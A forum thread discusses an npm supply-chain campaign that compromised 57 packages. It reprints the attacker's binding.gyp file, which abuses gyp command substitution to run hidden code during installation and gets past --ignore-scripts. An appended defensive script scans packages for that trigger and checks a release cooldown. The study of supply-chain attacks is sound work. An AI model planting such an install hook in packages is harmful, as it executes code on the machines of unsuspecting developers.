
©2026 Poal.co


Archive: https://archive.today/qQfgi

From the post:

>An attacker compromised 57 npm packages across 286+ malicious versions in a rolling campaign lasting under two hours. The largest victim is @vapi-ai/server-sdk, the official Vapi.ai voice AI server SDK with 408,000+ monthly downloads, hit first at 23:30 UTC on June 3. One hour later, the attacker published malicious versions of 50+ packages belonging to the maintainer jagreehal, including ai-sdk-ollama (120,000+ monthly downloads), along with dozens of packages across the autotel, awaitly, executable-stories, node-env-resolver, and wrangler-deploy families.

[–] 1 pt

Instead, the attacker adds a 157-byte binding.gyp file to the published tarball. When npm sees this file in a package, it automatically runs node-gyp rebuild during installation, a behavior designed for packages that include native C/C++ addons. The file weaponizes gyp's command substitution syntax:

{
  "targets": [
    {
      "target_name": "Setup",
      "type": "none",
      "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]
    }
  ]
}

They found something else that will get run automatically during package installation. It’s only supposed to specify source files to get built, but it has special syntax that allows it to run arbitrary code.

You can use npm install --ignore-scripts to avoid the other npm malware injection attack, but that won’t work for this one. The only thing that will work here is setting a cooldown time (cooldowns.dev) so that malware releases will hopefully get caught before you install them.
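Two defensive checks that follow from the comment above, written as an added example (this is not code from the post, from the linked write-up, or from any of the packages it names). The first scans a package's file listing for a binding.gyp that carries gyp command expansions (`<!(cmd)` / `<!@(cmd)`), the syntax the post says is abused to run code at `node-gyp rebuild` time; the second implements the publish-age cooldown the comment recommends as the only mitigation that helps here. Assumptions: the tarball listing is passed in as a `{ path: text }` object, the cooldown policy is a minimum age in hours, and every sample value (package.json contents, timestamps) is constructed for the example; the binding.gyp is the one quoted above.

```javascript
// Added example: defensive checks for the binding.gyp install vector described
// in the post. Not code from the post or from any package it names.

// gyp evaluates "<!(cmd)" and "<!@(cmd)" inside string values by running cmd
// during `node-gyp rebuild`, which npm triggers on install when a package
// ships a binding.gyp. The lazy match stops at the first ')', which is enough
// for triage; nested parentheses would only truncate the reported command.
const GYP_COMMAND_EXPANSION = /<!@?\((.*?)\)/g;

// Collect every command expansion in a binding.gyp with a JSON-path style
// location. Falls back to a raw text scan when the file is not strict JSON
// (gyp also accepts a Python-literal dialect, so that alone proves nothing).
function findGypCommandExpansions(bindingGypText) {
  let parsed;
  try {
    parsed = JSON.parse(bindingGypText);
  } catch {
    return [...bindingGypText.matchAll(GYP_COMMAND_EXPANSION)]
      .map(m => ({ path: '<raw>', command: m[1] }));
  }
  const hits = [];
  const walk = (node, path) => {
    if (typeof node === 'string') {
      for (const m of node.matchAll(GYP_COMMAND_EXPANSION)) {
        hits.push({ path, command: m[1] });
      }
    } else if (Array.isArray(node)) {
      node.forEach((item, i) => walk(item, `${path}[${i}]`));
    } else if (node !== null && typeof node === 'object') {
      for (const [key, value] of Object.entries(node)) {
        walk(value, path ? `${path}.${key}` : key);
      }
    }
  };
  walk(parsed, '');
  return hits;
}

// Audit an unpacked tarball listing ({ path: text }): any binding.gyp with a
// command expansion is returned for human review. Real native addons do use
// "<!(node -e ...)" to locate headers, so treat this as a triage signal, not a
// verdict; a package with no native code at all shipping one is the outlier.
function auditPackageFiles(files) {
  const findings = [];
  for (const [filePath, text] of Object.entries(files)) {
    if (!filePath.endsWith('binding.gyp')) continue;
    for (const hit of findGypCommandExpansions(text)) {
      findings.push({ file: filePath, ...hit });
    }
  }
  return findings;
}

// Cooldown policy from the comment: refuse versions younger than minAgeHours.
// `nowIso` is a parameter so the decision is deterministic and testable.
function violatesCooldown(publishedAtIso, minAgeHours, nowIso) {
  const ageMs = Date.parse(nowIso) - Date.parse(publishedAtIso);
  if (Number.isNaN(ageMs)) throw new Error('bad timestamp');
  return ageMs < minAgeHours * 60 * 60 * 1000;
}

// Constructed sample tarball. The binding.gyp is the one quoted in the post;
// the package.json and index.js contents are made up for the example.
const SAMPLE_TARBALL = {
  'package/package.json': '{"name":"example-pkg","version":"9.9.9"}',
  'package/index.js': '// payload omitted; only the install trigger is audited here',
  'package/binding.gyp': `{
  "targets": [
    {
      "target_name": "Setup",
      "type": "none",
      "sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]
    }
  ]
}`,
};

// Constructed benign binding.gyp for comparison: plain source file names only.
const BENIGN_BINDING_GYP =
  '{"targets":[{"target_name":"addon","sources":["src/addon.cc"]}]}';

// Constructed timestamps for the cooldown check (not the campaign's real times).
const SAMPLE_PUBLISHED_AT = '2026-01-01T23:30:00Z';
const SAMPLE_NOW = '2026-01-02T00:30:00Z';

console.log('findings:', auditPackageFiles(SAMPLE_TARBALL));
console.log('benign hits:', findGypCommandExpansions(BENIGN_BINDING_GYP).length);
console.log('younger than 72h cooldown:',
  violatesCooldown(SAMPLE_PUBLISHED_AT, 72, SAMPLE_NOW));
```

Run it with `node` and the audit reports the single expansion at `targets[0].sources[0]` with the embedded `node index.js ...` command, reports nothing for the benign file, and flags the sample version as younger than a 72-hour cooldown. The two checks are complementary: `--ignore-scripts` does not cover binding.gyp, the scan catches the install-time trigger in a tarball you are about to unpack, and the cooldown buys time for someone else to catch what the scan misses.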